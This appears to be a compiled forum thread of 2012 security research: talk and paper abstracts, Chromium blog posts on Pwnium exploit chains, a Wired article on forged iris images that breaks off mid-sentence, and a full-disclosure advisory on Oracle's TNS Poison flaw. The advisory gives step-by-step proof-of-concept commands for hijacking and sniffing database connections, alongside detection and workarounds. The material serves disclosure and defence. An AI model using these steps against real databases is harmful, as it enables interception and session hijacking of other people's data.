Smashing the Atom About Me Security Researcher at Azimuth Security Past presentations Heaps of Doom (/w Chris Valasek) Kernel Attacks Through User-Mode Callbacks Kernel Pool Exploitation on Windows 7 Generally interested in operating system internals and bug finding Recent focus on embedded platforms This Talk A rather unusual Windows bug class Affects Windows atoms 3 vulnerabilities patched 2 days ago in MS12-041 Allows a non-privileged user to run code in the context of a privileged process E.g. the Windows login manager (winlogon) No need to run arbitrary code in Ring 0 DEP/ASLR? SMEP? No problem! Download: http://mista.nu/research/smashing_the_atom.pdf
-
The history of a -probably- 13 years old Oracle bug: TNS Poison From: Joxean Koret <joxeankoret () yahoo es> Date: Wed, 18 Apr 2012 23:03:00 +0200 tl;dr -> Patch your database ASAP with Oracle Critical Patch Update April 2012. Introduction ------------ The following advisory explains a vulnerability I found in 2008 in all versions of Oracle Database server until very recently. The bug is probably available in any Oracle Database version since 1999 (Oracle 8i) to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was reported to Oracle in 2008 so it "only" took them 4 years to fix the vulnerability since reported. The vulnerability I called TNS Poison affects the component called TNS Listener, which is the responsible of connections establishment. To exploit the vulnerability no privilege is needed, just network access to the TNS Listener. The “feature” exploited is enabled by default in all Oracle versions starting with Oracle 8i and ending with Oracle 11g (without CPU-APR-2012). Vulnerability details --------------------- The Oracle TNS Listener component routes connections from the client to the database server depending on the database's instance name the client wants to connect to. These instances are registered at the TNS Listener by using any of the following methods: 1. Local registration. The database's internal process PMON connects via IPC to the TNS Listener and registers the database's instance name in the local listener. This can be changed by altering the system parameter LOCAL_LISTENER (ALTER SYSTEM SET LOCAL_LISTENER='LISTENER_NAME'). 2. Remote registration. The database's internal process PMON connects via TCP (or any other network supported protocol such) to the remote TNS Listener and registers the database's instance name in the remote listener. This behavior can be specified by setting the system parameter REMOTE_LISTENER (ALTER SYSTEM SET REMOTE_LISTENER='REMOTE_LISTENER_NAME'). This feature (remote registration) appeared first in Oracle 8i (1999) -this is the reason why I say it's probably vulnerable since this version, however, I didn't tested with such old database servers- and is currently used in Oracle 11g as well as in Oracle9i and 10g. The process of registering an instance is as follows: 1. The client sends a TNS packet of type CONNECT (TNS_TYPE_CONNECT = 1) to the TNS Listener with the following NV string: ? Oracle 9i to 11g: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR)) ? Oracle 8i: (CONNECT_DATA=(COMMAND=SERVICE_REGISTER)) 2. The server answers with a TNS packet of type ACCEPT (TNS_TYPE_ACCEPT = 2). After this, the protocol communication changes a bit (all data will be binary). 3. The client sends a “data packet” (TNS_TYPE_DATA = 6) to the TNS listener which contains the following data: 1. Service name to register. 2. Instances to register under the specified service name. 3. Maximum number of client connections allowed. 4. Current number of client connections established. 5. Handler's name. 6. IP address and port to connect to the database. 7. ... 4. If the packet is well formed, the server will answer with another TNS “data packet” with the instances registered. After this step, the instances and service names are registered in the remote TNS Listener and any connection attempt to the TNS listener by using the specified SERVICE_NAME or SID (database's instance) will be routed to the remote database server. The connection established to register the remote database must be open, otherwise, the remote TNS listener will consider that the database was crashed and deregisters the Oracle database's instance. According to the Oracle documentation, the “PMON” process, after this, will communicate with the TNS Listener sending update packets (TNS_TYPE_DATA packets) to specify the load of the database, the number of currently connected users, etc... Every one minute or, as most, every 10 minutes (Higher database load, lower update period). This way, an attacker is able to register any instance in the remote TNS listener and connections to the registered instance will be routed to the attackers machine but, is this interesting? Well, not very “exciting”. But, what occurs if an attacker tries to register one already registered instance's name or service name? The TNS listener will consider this newer registered instance name a cluster instance (Oracle RAC, Real Application Clusters) or a fail over instance (Oracle Fail over). When 2 or more database instances are registered with the same name the TNS listener will make load balance between all the registered remote database servers. The latest registered remote database server will receive the first client connection and the second will be routed to the previously registered remote database server. Routing client connections -------------------------- The attack explained in this document can be used to, in example, route legitimate client connections to one attacker controlled machine and forward them to the legitimate database server instance as shown bellow: ------------------------------------------------------------------------ [Legit. Client 1]---------------------------- \ \ \ V [Legit. Client 2]---------------+ [Database Server] | A [Legit. Client 3]---------------+ | | | V | [ Attacker ]----------------+ [Note: Between 50/75% of the connections gets routed through the attacker controlled box] ------------------------------------------------------------------------ The clients connects to the attacker's controlled box which acts as a TNS proxy and forwards all connections to the legitimate database server, as shown in the picture. Not all the connections will be routed through the attacker's box as the TNS Listener will make load balance between all the established instances but, continuously registering the same instance will assure, at least, that the 50% of the connections will be routed through our controlled box. Sniffing connections -------------------- The very first use of the attack explained in this document is obvious: The attacker owns the data as almost all the connections goes through the attacker's box. The attacker can record all the data exchanged between the database server and the client machines and both client and server will be oblivious of the attack. If the attacker just wants to own the target's data, (s)he is done. Game over. Injecting arbitrary commands (Session hijack) --------------------------------------------- As many of the client connections are connected to the legitimate database through our proxy, we are also able to inject commands and/or hijack connections. To inject commands, simply, wait for the customer to send an SQL query/statement, replace the contents of the statement with our desired command and that's all. For session's hijack, simply, close the socket opened between the client and our box and use the established connection channel between the real database server and our machine. You may start sending SQL statements right now. Exploiting the vulnerability ---------------------------- The following sections show how can be launched a successful attack against one Oracle database. The developed POC registers the service name ORCL11 in the TNS Listener and forwards all the connections from the attacker's controlled machine to the legitimate server. Sniffing connections and forwarding client requests --------------------------------------------------- Imagine the following exploit scenario: 1. The database server's IP address is 192.168.1.11 and has registered the instance ORCL11. 2. The legitimate client's address is 192.168.1.12. 3. The attackers machine's address is 192.168.1.25. An attacker will follow these steps: 1. The attacker runs a TCP proxy which forwards all connections to his/her local port 1521 to the real database's server port 1521. 2. Attacker, now, connects to the TNS Listener via TCP/IP and sends the following connect packet: (COMMAND=SERVICE_REGISTER_NSGR). 1. Note that no authentication is required. 3. After receiving the server's answer the attacker sends a packet with the following data: 1. Service to register: ORCL11. 2. Address of the fake database: 192.168.1.25. 3. Load of the database's server: 0. 1. Remember: The lower load, the higher possibility to receive client connections. 4. The attacker's developed exploit enters in a loop and registers the instance every one minute closing the previously opened socket. 1. The last registered database's address is the favorite to route client connections and the attacker wants to receive them all. Proof of concept notes ---------------------- The developed P.O.C. is valid just for 6 characters long service names. However, there is one easy way to change the exploit to make it working against any non 6 characters long instance name: 1. Create a database instance with the same name in a machine under your control. 2. Add an entry like the following to your tnsnames.ora file: listener_name = (DESCRIPTION= (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.11)(PORT=1521))) 3. Change the address and port to those of the target. 4. Put an sniffer in your machine listening for any connection at port 1521 (Filter: port 1521). 5. Connect using SQL*Plus to your locally created database as SYSDBA and execute the following commands: 1. $ sqlplus / as sysdba 2. SQL> ALTER SYSTEM SET REMOTE_LISTENER='LISTENER_NAME'; 3. SQL> ALTER SYSTEM REGISTER; 6. You will see 6 packets in Wireshark (or the sniffer you decided to use). Ignore the 2 first packets. The 3rd packet (TNS_TYPE_DATA) that your configured database sends from your box to the target is the one you are interested in. You may safely ignore all the other packets. 7. Change the contents of the “buf” variable in the supplied exploit with the contents of this packet. 8. Rerun the exploit against the target. NOTE: You may use this as another attack vector. As your database (which has the same name as the target) is registered in the remote TNS Listener, new connections that goes through the TNS listener you poisoned will be routed to your new database. Funny. TNS Poison POC: Step by step guide ---------------------------------- This is the step by step guide to proof the vulnerability explained in this document by using the supplied POC and the aux module: 1. Open a terminal and run the supplied proxy.py script as shown bellow: $ ./proxy.py –localip 192.168.1.25 localport 1521 –remoteip 192.168.1.11 remoteport 1521 2. Open another terminal and run the supplied script tnspoison.py against the target as in the example shown bellow: $ ./tnspoisonv1.py 192.168.1.25 1521 ORCL11 192.168.1.11 1521 Sending initial buffer ... Answer: Accept(2) Sending registration ... '\x04N\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x04D \x08\xff\x03\x01\x00\x124444...' Answer: Data(6) '\x01J\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x01@ \x08\xff\x03\x01\x00\x1244444...' Sleeping for 10 seconds... (Ctrl+C to stop)... Now, wait for the new connections to arrive. If you checks the listener using the LSNRCTL tool you will something like the following: $ lsnrctl status LSNRCTL for Linux: Version 11.1.0.6.0 Production Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) STATUS of the LISTENER ---------------------- Alias LISTENER Version TNSLSNR for Linux: Version 11.1.0.6.0 Production Start Date 08AUG2008 18:38:08 Uptime 0 days 0 hr. 15 min. 46 sec Trace Level off Security ON: Local OS Authentication SNMP OFF Listener Parameter File /home/joxean/oracle11g/product/11.1.0/db_2/network/admin/listener.ora Listener Log File /home/joxean/oracle11g/diag/tnslsnr/joxeandesktop/ listener/alert/log.xml Listening Endpoints Summary... (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=1521))) Services Summary... Service "ORCL11" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... Service "ORCL11XDB" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... Service "ORCL11_XPT" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Instance "ORCL11", status READY, has 1 handler(s) for this service... The command completed successfully $ lsnrctl services LSNRCTL for Linux: Version 11.1.0.6.0 Production Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) Services Summary... Service "ORCL11" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready LOCAL SERVER Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready REMOTE SERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) Service "ORCL11XDB" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "D000" established:0 refused:0 current:0 max:972 state:ready DISPATCHER <machine: machine, pid: 19194> (ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=42265)) Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "D000" established:0 refused:0 current:2048 max:1024 state:ready DISPATCHER <machine: 192.168.1.25 , pid: 11447> (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.25)(PORT=57569)) Service "ORCL11_XPT" has 2 instance(s). Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready LOCAL SERVER Instance "ORCL11", status READY, has 1 handler(s) for this service... Handler(s): "DEDICATED" established:0 refused:0 state:ready REMOTE SERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) The command completed successfully Detection --------- The following sections explains how this attack can be somewhat detected at the server side, although no one is perfect (except using OS utilities). Information at the RDBMS Server side ------------------------------------ One may think the following: “Hey! At the server side, the DBA will see that the connections are established from untrusted clients, right?”. Well, yes and no. By using operating system tools, as is pretty obvious, the DBA will see that there are many connections from the same origin host but, by using the V$SESSION dynamic view, that is, the Oracle database's supplied mechanism to see the client connections, the DBA will see that the connections are established from trusted clients. But, they aren't. Why the server thinks client connections are coming from trusted sources? The answer is the following: The server doesn't check if the connections comes from a socket created from the trusted client ip addresses, the RDBMS server just checks the user supplied NV strings in the TNS connect packet. A TNS connect packet (TNS_TYPE_CONNECT = 1) is like the following (stripping all the binary characters, of course): (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=sqlplus) (HOST=joxeandesktop)(USER=joxean))) (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.11)(PORT=1521))) The highlighted fields are those that are fakeable^Wuser modifiable. So, any connection established through our controlled machine will be shown in the RDBMS server as if they were made directly from trusted clients. TNS Listener's log file ----------------------- Any attempt to register a new database instance or service will be registered in the TNS Listener. A line like the following will be shown: 04AUG2008 21:26:29 * service_register * DATABASENAME * 0 It isn't sufficient/enough information but, this way, we may detect an attempt to register a new instance. No interesting information (like IP address, client port, etc...) is registered so, the TNS listener's log file is not very interesting. This applies just for Oracle 8i, 9i and 10g. For Oracle 11g, however, the interesting information will logged in the alert file (one XML formatted file). In Oracle 11g any attempt to register a new instance will be logged in the alert file with the following information: <msg time='20080807T17: 30:19.436+02:00' org_id='oracle' comp_id='tnslsnr' type='UNKNOWN' level='16' host_id='joxeandesktop' host_addr='127.0.0.1'> <txt>07AUG2008 17:30:19 * service_register * ORCL11 * 0 </txt> </msg> Unfortunately for us^Wthe attacker, the “host_addr” field holds the information extracted from the socket, not from the NV strings. Oh... This only applies to Oracle 11g with the newest security features enabled which is, by the way, default behavior. Anyway, an attack detected at the TNS listener's log level is not a detected attack at the RDBMS server level, neither an attack prevention method. Workarounds ----------- Better than using workarounds is to patch the vulnerability. However, in case you're using an outdated version for which no patch is available or if you can't pach for a reason, the following is a list of possible workarounds. Possible workarounds -------------------- There are many possible workarounds. The easier one is to set the following parameter in the listener.ora configuration file: dynamic_registration = off. But, sometimes, you don't want to apply this workaround. In example, if you have an Oracle RAC cluster, all the cluster's instances must be registered in both TNS Listeners so, this workaround is not suitable for Oracle RAC clusters. To apply this workaround with Oracle RAC environments one needs to implement load balancing at the client side, changing all the client's tnsnames.ora configuration file to add the complete list of Oracle RAC nodes. However, there is another possible workaround that, sometimes, is suitable for Oracle RAC environments. Edit the file protocol.ora or, for older versions, sqlnet.ora, at the server side and add the following directives: TCP.VALIDNODE_CHECKING = YES TCP.INVITED_NODE = (Comma,separated,list,of,ALL,valid,clients, ...) But, anyway, this workaround doesn't prevent valid clients from being used as proxies. Valid clients can still exploit the vulnerability regardless the VALIDNODE_CHECKING directive added as the client is a valid node. Then again, there is one more suitable workaround: If customer bought (and enabled) Oracle Advanced Security feature clients can be configured to use SSL/TLS. Thus, at both client and server side, the following parameters must be changed in protocol.ora or sqlnet.ora: Client side: SQLNET.ENCRYPTION_CLIENT=REQUIRED Server side: SQLNET.ENCRYPTION_SERVER=REQUIRED The value of these configuration directives must be REQUIRED and not REQUESTED, as is pretty common, otherwise the attacker can answer to the connection attempt answering that no SSL cipher is supported at the server side (as the attacker's controlled box is for the client the trusted database's server) and the client will reconnect without using SSL. Patch information ----------------- The vulnerability is supposed to be fixed, as reported by Oracle, with Oracle Critical Patch Update April 2012. However, I didn't tested it myself and, to be honest, I'm very tired of the Oracle world so I did not tested it myself. I would not be surprised if the patch doesn't correctly/completely fix the vulnerability. Proof of concept and documentation ---------------------------------- You can download the developed proof of concept and the old documentation -wrote back in 2008- from the following links: Documentation: http://www.joxeankoret.com/download/tnspoison.pdf Proof of concept: http://www.joxeankoret.com/download/tnspoison.zip References ---------- Oracle Critical Patch Update Advisory - April 2012: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html Oracle Advanced Security Manual: Oracle 11g http://download.oracle.com/docs/cd/B28359_01/network.111/b28530/asossl.htm Oracle 10g http://download.oracle.com/docs/cd/B19306_01/network.102/b14268/toc.htm Oracle 9i http://downloadwest.oracle.com/docs/cd/B10500_01/network.920/a96573/toc.htm Oracle 8i http://downloaduk.oracle.com/docs/cd/A87860_01/doc/network.817/a85430/toc.htm Oracle 8.1.6 Registration: http://www.orafaq.com/node/30 Configuring Remote Listener Registration: http://download.oracle.com/docs/cd/B10501_01/network.920/a96580/listener.htm#490372 Notes ----- Many of the notes, outputs from terminals, etc... are simply taken from my original notes back from 2008 so, probably, there can be many things outdated. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact ------- The vulnerability was found by Joxean Koret in 2008. All your listeners are belong to us... Attachment: signature.asc Description: This is a digitally signed message partSursa: Full Disclosure: The history of a -probably- 13 years old Oracle bug: TNS Poison
-
Packets in Packets: OrsonWelles’ In-Band Signaling Attacks for Modern Radios Travis Goodspeed University of Pennsylvania Sergey Bratus Dartmouth College Ricky Melgares Dartmouth College Rebecca Shapiro Dartmouth College Ryan Speers Dartmouth College Abstract Here we present methods for injecting raw frames at Layer 1 from within upper-layer protocols by abuse of in-band signaling mechanisms common to most digital radio protocols. This packet piggy-backing technique allows attackers to hide malicious packets inside packets that are permitted on the network. When these carefully crafted Packets-in-Packets (PIPs) traverse a wireless network, a bit error in the outer frame will cause the inner frame to be interpreted instead. This allows an attacker to evade firewalls, intrusion detection/prevention systems, user-land networking restrictions, and other such defenses. As packets are constructed using interior fields of higher networking layers, the attacker only needs the authority to send cleartext data over the air, even if it is wrapped within several networking layers. This paper includes tested examples of raw frame injection for IEEE 802.15.4 and 2-FSK radios. Additionally, implementation complications are described for 802.11 and a variety of other modern radios. Finally, we present suggestions for how this technique might be extended from wireless radio protocols to Ethernet and other wired links. Download: http://static.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf
-
CVE-2012-0769, the case of the perfect info leak Author: Fermin J. Serna - fjserna gmail.com | fjserna google.com - @fjserna URL: http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf Code: http://zhodiac.hispahack.com/my-stuff/security/InfoLeak.as SWF: http://zhodiac.hispahack.com/my-stuff/security/InfoLeak.swf Date: 23/Feb/2012 TL;DR Flash is vulnerable to a reliable info leak that allows ASLR to be bypassed making exploitation of other vulnerabilities, on browsers, Acrobat Reader, MS Office and any process that can host Flash, trivial like in the old days where no security mitigations were available. Patch immediately. 1. Introduction Unless you use wget and vi to download and parse web content the odds are high that you may be exposed to a vulnerability that will render useless nearly all security mitigations developed in the latest years. Nowadays, security relies heavily on exploitation mitigation technologies. Over the past years there has been some investment on development of several mechanisms such as ASLR, DEP/NX, SEHOP, Heap metadata obfuscation, etc. The main goal of these is to decrease the exploitability of a vulnerability. The key component of this strategy is ASLR (Address Space Layout Randomization) [1] . Most other mitigations techniques depend on the operation of ASLR. Without it and based on previous research from the security industry: DEP can be defeated with return-to-libc or ROP gadget chaining, SEHOP can be defeated constructing a valid chain, ... Put simply, if you defeat ASLR, we are going to party like if it is 1999. And this is what happened, a vulnerability was found in Adobe’s Flash player (according to Adobe [2] installed on 99% of user computers) that with some magic, explained later, resulted in a multiplatform, highly stable and highly efficient info leak that could be combined with any other vulnerability for trivial exploitation. This vulnerability CVE-2012-0769, with another one that my colleague Tavis Ormandy found, were patched in version 11.1.102.63 [3] released the 05/Mar/2012. According to Adobe, all versions earlier to 11.1.102.63 are impacted by this vulnerability. Flash users can check their current version and latest available one at Adobe’s website[4]. Download: http://zhodiac.hispahack.com/my-stuff/security/Flash_ASLR_bypass.pdf
-
The story of CVE-2011-2018 exploitation Mateusz \j00ru" Jurczyk February - April 2012 Abstract Exploitation of Windows kernel vulnerabilities is recently drawing more and more attention, as observed in both monthly Microsoft advi- sories and technical talks presented on public security events. One of the most recent security aws xed in the Windows kernel was CVE-2011- 2018 1, a vulnerability which could potentially allow a local attacker to execute arbitrary code with system privileges. The problem aected all - and only - 32-bit editions of the Windows NT-family line, up to Win- dows 8 Developer Preview 2. In this article, I present how certain novel exploitation techniques can be used on dierent Windows platforms to reach an elevation of privileges through this specic kernel vulnerability. Download: j00ru.vexillium.org/blog/20_05_12/cve_2011_2018.pdf
-
[h=3]A Tale Of Two Pwnies (Part 2)[/h]Monday, June 11, 2012 When we wrapped up our recent Pwnium event, we praised the creativity of the submissions and resolved to provide write-ups on how the two exploits worked. We already covered Pinkie Pie’s submission in a recent post, and this post will summarize the other winning Pwnium submission: an amazing multi-step exploit from frequent Chromium Security Reward winner Sergey Glazunov. From the start, one thing that impressed us about this exploit was that it involved no memory corruption at all. It was based on a so-called “Universal Cross-Site Scripting” (or UXSS) bug. The UXSS bug in question (117226) was complicated and actually involved two distinct bugs: a state corruption and an inappropriate firing of events. Individually there was a possible use-after-free condition, but the exploit -- perhaps because of various memory corruption mitigations present in Chromium -- took the route of combining the two bugs to form a “High” severity UXSS bug. However, a Pwnium prize requires demonstrating something “Critical”: a persistent attack against the local user’s account. A UXSS bug alone cannot achieve that. So how was this UXSS bug abused more creatively? To understand Sergey’s exploit, it’s important to know that Chromium implements some of its built-in functions using special HTML pages (called WebUI), hosted at origins such as chrome://about. These pages have access to privileged JavaScript APIs. Of course, a normal web page or web renderer process cannot just iframe or open a chrome:// URL due to strict separation between http:// and chrome:// URLs. However, Sergey discovered that iframing an invalid chrome-extension:// resource would internally host an error page in the chrome://chromewebdata origin (117230). Furthermore, this error page was one of the few internal pages that did not have a Content Security Policy (CSP) applied. A CSP would have blocked the UXSS bug in this context. At this point, multiple distinct issues had been abused, to gain JavaScript execution in the chrome://chromewebdata origin. The exploit still had a long way to go, though, as there are plenty of additional barriers: chrome://chromewebdata does not have any sensitive APIs associated with it. chrome://a is not same-origin with chrome://b. chrome://* origins only have privileges when the backing process is tagged as privileged by the browser process, and this tagging only happens as a result of a top-level navigation to a chrome:// URL. The sensitive chrome://* pages generally have CSPs applied that prevent the UXSS bug in question. The exploit became extremely creative at this point. To get around the defenses, the compromised chrome://chromewebdata origin opened a window to chrome://net-internals, which had an iframe in its structure. Another WebKit bug -- the ability to replace a cross-origin iframe (117583) -- was used to run script that navigated the popped-up window, simply “back” to chrome://net-internals (117417). This caused the browser to reassess the chrome://net-internals URL as a top-level navigation -- granting limited WebUI permissions to the backing process as a side-effect (117418). The exploit was still far from done. It was now running JavaScript inside an iframe inside a process with limited WebUI permissions. It then popped up an about:blank window and abused another bug (118467) -- this time in the JavaScript bindings -- to confuse the top-level chrome://net-internals page into believing that the new blank window was a direct child. The blank window could then navigate its new “parent” without losing privileges (113496). The first navigation was to chrome://downloads, which gained access to additional privileged APIs. You probably get a sense of where the exploit was headed now. It finished off by abusing privileged JavaScript APIs to download an attack DLL. The same APIs were used to cleverly “download” and run wordpad.exe from the local disk (thus avoiding the system-level prompt for executing downloads from the internet zone). A design quirk of the Windows operating system caused the attack DLL to be loaded into the trusted executable. As you can imagine, it took us some time to dissect all of this. Distilling the details into a blog post was a further challenge; we’ve glossed over the use of the UXSS bug to bypass pop-up window restrictions. The UXSS bug was actually used three separate times in the exploit. We also omitted details of various other lockdowns we applied in response to the exploit chain. What’s clear is that Sergey certainly earned his $60k Pwnium reward. He chained together a whopping 14 [*] bugs, quirks and missed hardening opportunities. Looking beyond the monetary prize, Sergey has helped make Chromium significantly safer. Besides fixing the array of bugs, we’ve landed hardening measures that will make it much tougher to abuse chrome:// WebUI pages in the future. Posted by Ken Buchanan, Chris Evans, Charlie Reis and Tom Sepez, Software Engineers Sursa: Chromium Blog: A Tale Of Two Pwnies (Part 2)
-
[h=3]A Tale of Two Pwnies (Part 1)[/h]Tuesday, May 22, 2012 Just over two months ago, Chrome sponsored the Pwnium browser hacking competition. We had two fantastic submissions, and successfully blocked both exploits within 24 hours of their unveiling. Today, we’d like to offer an inside look into the exploit submitted by Pinkie Pie. So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of six different bugs in order to successfully break out of the Chrome sandbox. Pinkie’s first bug (117620) used Chrome’s prerendering feature to load a Native Client module on a web page. Prerendering is a performance optimization that lets a site provide hints for Chrome to fetch and render a page before the user navigates to it, making page loads seem instantaneous. To avoid sound and other nuisances from preloaded pages, the prerenderer blocks plug-ins from running until the user chooses to navigate to the page. Pinkie discovered that navigating to a pre-rendered page would inadvertently run all plug-ins—even Native Client plug-ins, which are otherwise permitted only for installed extensions and apps. Of course, getting a Native Client plug-in to execute doesn’t buy much, because the Native Client process’ sandbox is even more restrictive than Chrome’s sandbox for HTML content. What Native Client does provide, however, is a low-level interface to the GPU command buffers, which are used to communicate accelerated graphics operations to the GPU process. This allowed Pinkie to craft a special command buffer to exploit the following integer underflow bug (117656) in the GPU command decoding: static uint32 ComputeMaxResults(size_t size_of_buffer) { return (size_of_buffer - sizeof(uint32)) / sizeof(T); } The issue here is that if size_of_buffer is smaller than sizeof(uint32), the result would be a huge value, which was then used as input to the following function: static size_t ComputeSize(size_t num_results) { return sizeof(T) * num_results + sizeof(uint32); } This calculation then overflowed and made the result of this function zero, instead of a value at least equal to sizeof(uint32). Using this, Pinkie was able to write eight bytes of his choice past the end of his buffer. The buffer in this case is one of the GPU transfer buffers, which are mapped in both processes’ address spaces and used to transfer data between the Native Client and GPU processes. The Windows allocator places the buffers at relatively predictable locations; and the Native Client process can directly control their size as well as certain object allocation ordering. So, this afforded quite a bit of control over exactly where an overwrite would occur in the GPU process. The next thing Pinkie needed was a target that met two criteria: it had to be positioned within range of his overwrite, and the first eight bytes needed to be something worth changing. For this, he used the GPU buckets, which are another IPC primitive exposed from the GPU process to the Native Client process. The buckets are implemented as a tree structure, with the first eight bytes containing pointers to other nodes in the tree. By overwriting the first eight bytes of a bucket, Pinkie was able to point it to a fake tree structure he created in one of his transfer buffers. Using that fake tree, Pinkie could read and write arbitrary addresses in the GPU process. Combined with some predictable addresses in Windows, this allowed him to build a ROP chain and execute arbitrary code inside the GPU process. The GPU process is still sandboxed well below a normal user, but it’s not as strongly sandboxed as the Native Client process or the HTML renderer. It has some rights, such as the ability to enumerate and connect to the named pipes used by Chrome’s IPC layer. Normally this wouldn’t be an issue, but Pinkie found that there’s a brief window after Chrome spawns a new renderer where the GPU process could see the renderer’s IPC channel and connect to it first, allowing the GPU process to impersonate the renderer (bug 117627). Even though Chrome’s renderers execute inside a stricter sandbox than the GPU process, there is a special class of renderers that have IPC interfaces with elevated permissions. These renderers are not supposed to be navigable by web content, and are used for things like extensions and settings pages. However, Pinkie found another bug (117417) that allowed an unprivileged renderer to trigger a navigation to one of these privileged renderers, and used it to launch the extension manager. So, all he had to do was jump on the extension manager’s IPC channel before it had a chance to connect. Once he was impersonating the extensions manager, Pinkie used two more bugs to finally break out of the sandbox. The first bug (117715) allowed him to specify a load path for an extension from the extension manager’s renderer, something only the browser should be allowed to do. The second bug (117736) was a failure to prompt for confirmation prior to installing an unpacked NPAPI plug-in extension. With these two bugs Pinkie was able to install and run his own NPAPI plug-in that executed outside the sandbox at full user privilege. So, that’s the long and impressive path Pinkie Pie took to crack Chrome. All the referenced bugs were fixed some time ago, but some are still restricted to ensure our users and Chromium embedders have a chance to update. However, we’ve included links so when we do make the bugs public, anyone can investigate in more detail. In an upcoming post, we’ll explain the details of Sergey Glazunov’s exploit, which relied on roughly 10 distinct bugs. While these issues are already fixed in Chrome, some of them impact a much broader array of products from a range of companies. So, we won’t be posting that part until we’re comfortable that all affected products have had an adequate time to push fixes to their users. Posted by Jorge Lucangeli Obes and Justin Schuh, Software Engineers Sursa: Chromium Blog: A Tale of Two Pwnies (Part 1)
-
[h=1]Reverse-Engineered Irises Look So Real, They Fool Eye-Scanners[/h]By Kim Zetter July 25, 2012 Researchers reverse-engineered iris codes to create synthetic eye images that tricked an iris-recognition system into thinking they were authentic. Can you tell if this is the real image or the synthetic one? All images courtesy of Javier Galbally LAS VEGAS — Remember that scene in Minority Report when the spider robots stalk Tom Cruise to his apartment and scan his iris to identify him? Things could have turned out so much better for Cruise had he been wearing a pair of contact lenses embossed with an image of someone else’s iris. New research being released this week at the Black Hat security conference by academics in Spain and the U.S. may make that possible. The academics have found a way to recreate iris images that match digital iris codes that are stored in databases and used by iris-recognition systems to identify people. The replica images, they say, can trick commercial iris-recognition systems into believing they’re real images and could help someone thwart identification at border crossings or gain entry to secure facilities protected by biometric systems. The work goes a step beyond previous work on iris-recognition systems. Previously, researchers have been able to create wholly synthetic iris images that had all of the characteristics of real iris images — but weren’t connected to real people. The images were able to trick iris-recognition systems into thinking they were real irises, though they couldn’t be used to impersonate a real person. But this is the first time anyone has essentially reverse-engineered iris codes to create iris images that closely match the eye images of real subjects, creating the possibility of stealing someone’s identity through their iris. “The idea is to generate the iris image, and once you have the image you can actually print it and show it to the recognition system, and it will say ‘okay, this is the guy,’” says Javier Galbally, who conducted the research with colleagues at the Biometric Recognition Group-ATVS, at the Universidad Autonoma de Madrid, and researchers at West Virginia University. Or is this? Is this real? Iris-recognition systems are rapidly growing in use around the world by law enforcement agencies and the commercial sector. They’re touted as faster, more sanitary and more accurate than fingerprint systems. Fingerprint systems measure about 20-40 points for matching while iris recognition systems measure about 240 points. Schipol Airport in the Netherlands allows travelers to enter the country without showing a passport if they participate in its Privium iris recognition program. When travelers enroll in the program, their eyes are scanned to produce binary iris codes that are stored on a Privium card. At the border crossing, the details on the card are matched to a scan taken of the cardholder’s eye to allow the person passage. Since 2004, airports in the United Kingdom have allowed travelers registered in its iris-recognition program to pass through automated border gates without showing a passport, though authorities recently announced they were dropping the program because passengers had trouble properly aligning their eyes with the scanner to get automated gates to open. Google also uses iris scanners, along with other biometric systems, to control access to some of its data centers. And the FBI is currently testing an iris-recognition program on federal prison inmates in 47 states. Inmate iris scans are stored in a database managed by a private firm named BI2 Technologies and will be part of a program aimed at quickly identifying repeat offenders when they’re arrested as well as suspects who provide false identification. When someone participates in an iris-recognition system, his or her eyes are scanned to create iris codes, which are binary representations of the image. The iris code, which consists of about 5,000 bits of data, is then stored in a database for matching. The iris code is stored instead of the iris image for security and privacy reasons. When that person then later goes before an iris-recognition scanner – to obtain access to a facility, to cross a border or to access a computer, for example – their iris is scanned and measured against the iris code stored in the database to authenticate the person’s identity. It’s long been believed that it wasn’t possible to reconstruct the original iris image from an iris code stored in a database. In fact, B12 Technologies says on its web site that biometric templates “cannot be reconstructed, decrypted, reverse-engineered or otherwise manipulated to reveal a person’s identity. In short, biometrics can be thought of as a very secure key: Unless a biometric gate is unlocked by using the right key, no one can gain access to a person’s identity.” But the researchers showed that this is not always the case. And this? What about this? Their research involved taking iris codes that had been created from real eye scans as well as synthetic iris images created wholly by computers and modifying the latter until the synthetic images matched real iris images. The researchers used a genetic algorithm to achieve their results. Genetic algorithms are tools that improve results over several iterations of processing data. In this case, the algorithm examined the synthetic images against the iris code and altered the images until it achieved one that would produce a near identical iris code as the original iris image when scanned. “At each iteration it uses the synthetic images of the previous iteration to produce a new set of synthetic iris images that have an iris code which is more similar (than the synthetic images of the previous 